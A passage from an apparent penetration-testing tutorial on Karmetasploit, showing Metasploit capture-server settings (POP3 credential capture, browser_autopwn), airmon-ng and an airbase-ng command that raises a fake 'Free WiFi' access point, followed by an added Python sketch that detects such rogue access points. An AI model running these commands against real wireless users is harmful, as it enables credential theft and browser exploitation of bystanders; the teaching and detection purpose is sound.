Karmetasploit
set SRVPORT 55550
set URIPATH /ads
run
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run
After loading the database (db_connect postgres:toor@127.0.0.1/msfbook) in which to store its results, KARMA loads the browser_autopwn server as shown at . This is a handy way to attempt a number of exploits against a browser in an untargeted manner. A handful of the browser-based exploits in the Framework contain the directive include Msf::Exploit::Remote::BrowserAutopwn. Exploits that contain that include line will be attempted when the autopwn server is accessed.
At and , the local IP address is set to 10.0.0.1, which coincides with the default DHCP configuration. Then, in lines and on, the various servers are configured and started. (To get a complete picture of what occurs in this attack, read the resource file.)
Next, we place our wireless card in monitor mode. The way in which we do this depends on our wireless card's chipset. The wireless card in the following example uses the RT73 chipset. We use airmon-ng start wlan0 to place it in monitor mode:
root@bt:/opt/metasploit3/msf3# airmon-ng start wlan0
NOTE
If your card uses a different chipset from the one used in this example, visit the Aircrack-ng website (http://www.aircrack-ng.org/) for specifics on how to place your card in monitor mode.
Launching the Attack
The airbase-ng component of the Aircrack-ng suite is used to create Karmetasploit's fake access point. In the next example, we configure the airbase-ng access point to respond to all probes (-P), to beacon every 30 seconds (-C 30) with the ESSID Free Wi-Fi (-e "Free WiFi"), and to be verbose (-v) using the interface mon0:
root@bt:/opt/metasploit3/msf3# airbase-ng -P -C 30 -e "Free WiFi" -v mon0
14:06:57 Created tap interface at0
14:06:57 Trying to set MTU on at0 to 1500
14:06:57 Trying to set MTU on mon0 to 1800
14:06:57 Access Point with BSSID 00:21:29:E2:DE:14 started.
As you can see at , Airbase-ng creates a new interface called at0. Karmetasploit will use this interface.
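Seen from the monitoring side, an access point started with -P stands out because a single BSSID answers probes for whatever ESSID each client asks for. The following detection sketch is an added example, not part of the original text; the record format, the MAC addresses and the max_ssids threshold are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample: simplified 802.11 management-frame records
# (time, frame type, source MAC, destination MAC, SSID). Not a real capture format.
SAMPLE_FRAMES = """\
14:07:01 probe-req aa:aa:aa:00:00:01 ff:ff:ff:ff:ff:ff HomeNet
14:07:01 probe-resp 02:00:00:00:00:99 aa:aa:aa:00:00:01 HomeNet
14:07:02 probe-req aa:aa:aa:00:00:02 ff:ff:ff:ff:ff:ff CorpWLAN
14:07:02 probe-resp 02:00:00:00:00:99 aa:aa:aa:00:00:02 CorpWLAN
14:07:02 probe-resp 02:00:00:00:00:10 aa:aa:aa:00:00:02 CorpWLAN
14:07:03 probe-req aa:aa:aa:00:00:03 ff:ff:ff:ff:ff:ff CoffeeShop
14:07:03 probe-resp 02:00:00:00:00:99 aa:aa:aa:00:00:03 CoffeeShop
14:07:04 probe-req aa:aa:aa:00:00:01 ff:ff:ff:ff:ff:ff Free WiFi
14:07:04 probe-resp 02:00:00:00:00:99 aa:aa:aa:00:00:01 Free WiFi
"""


def parse_frames(text):
    """Yield (time, kind, src, dst, ssid); the SSID may contain spaces."""
    for line in text.splitlines():
        parts = line.split(" ", 4)
        if len(parts) == 5:
            yield tuple(parts)


def find_promiscuous_responders(frames, max_ssids=2):
    """Return {bssid: [ssids]} for BSSIDs that answered probes for more
    than max_ssids distinct SSIDs. Multi-SSID access points normally use
    one BSSID per SSID, so the threshold (an assumption) can stay low."""
    probed = defaultdict(set)     # client MAC -> SSIDs it asked for
    answered = defaultdict(set)   # BSSID -> probed SSIDs it claimed to be
    for _time, kind, src, dst, ssid in frames:
        if kind == "probe-req":
            probed[src].add(ssid)
        elif kind == "probe-resp" and ssid in probed[dst]:
            # Count only responses that echo what this client asked for.
            answered[src].add(ssid)
    return {b: sorted(s) for b, s in answered.items() if len(s) > max_ssids}


if __name__ == "__main__":
    hits = find_promiscuous_responders(parse_frames(SAMPLE_FRAMES))
    for bssid, ssids in hits.items():
        print(f"ALERT {bssid} answered probes for {len(ssids)} SSIDs: {ssids}")
```

In a real deployment the records would come from a wireless IDS sensor or a monitor-mode capture rather than the inline sample.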